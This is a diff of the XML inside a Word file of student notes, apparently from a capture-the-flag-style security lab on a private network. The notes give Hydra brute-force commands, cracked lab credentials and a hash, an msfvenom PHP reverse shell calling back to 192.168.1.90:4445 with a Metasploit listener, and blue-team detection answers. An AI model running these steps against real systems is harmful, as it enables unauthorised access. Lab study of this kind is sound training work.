+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Gunzip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> rockyou.txt.gz</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>To verify unzip</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Hydra help to see options/flags</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ashton manages secret folder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Use username </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ashton</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hydra -l jigsaw -</w:t>
+      </w:r>
+      <w:r>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> rockyou.txt -s 80 -f -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 192.168.1.105 http-get /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>company_folders</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>secret_folder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ashton:leopoldo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">open connect to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>corp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webdav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ryan’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> account</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ryans</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> hash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="4"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>d7dad0a5cd7c8376eeb50d69b3ccd352”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Echo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>d7dad0a5cd7c8376eeb50d69b3ccd352</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt; hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>John hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>John -show hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="4"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Ryan:linux</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>4u</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Upload reverse shell php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p php/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>reverse_php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LHOST=192.168.1.90 LPORT=444</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -f raw &gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>exploit.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Create listener</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Use exploit/multi/handler</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Set LHOST 192.168.1.90</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Set LPORT 4445</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Set exploit php/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Cd /</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Cat flag.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
     </w:p>
@@ -353,8 +1319,124 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6E976846"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="20C21CCA"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -863,6 +1945,29 @@
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002D35BD"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002D35BD"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Notes/Project2 Notes.docx
+++ b/Notes/Project2 Notes.docx
@@ -551,7 +551,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>webdav</w:t>
+        <w:t>company_folders_secret_folder</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -708,13 +708,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Hydra -l jigsaw -</w:t>
-      </w:r>
-      <w:r>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> rockyou.txt -s 80 -f -</w:t>
+        <w:t xml:space="preserve">Hydra -l </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ashton</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -P rockyou.txt -s 80 -f -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -846,7 +848,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>d7dad0a5cd7c8376eeb50d69b3ccd352”</w:t>
+        <w:t>”</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/Notes/Project2 Notes.docx
+++ b/Notes/Project2 Notes.docx
@@ -848,7 +848,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>”</w:t>
+        <w:t>d7dad0a5cd7c8376eeb50d69b3ccd352”</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/Notes/Project2 Notes.docx
+++ b/Notes/Project2 Notes.docx
@@ -1187,14 +1187,555 @@
         <w:t>Cat flag.txt</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Part 3</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Identifying offensive traffic</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>When did the attack occur?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>between 12am and 2 am UTC</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>What response did the victim send back?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> Http Code 401 (Unauthorized)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">522,611 hits </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>What is concerning from the blue team perspective?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">There are a lot of unauthorized login attempts. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Find the requests for the hidden directory</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>How many requests were made to the directory?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>15,583</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Which files were requested?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>connect_to_corp_server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>What kind of alarm would you set to detect this behavior in the future?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Alert if more than x </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>amount</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> of requests in x amount of time</w:t>
+      </w:r>
+    </w:p>
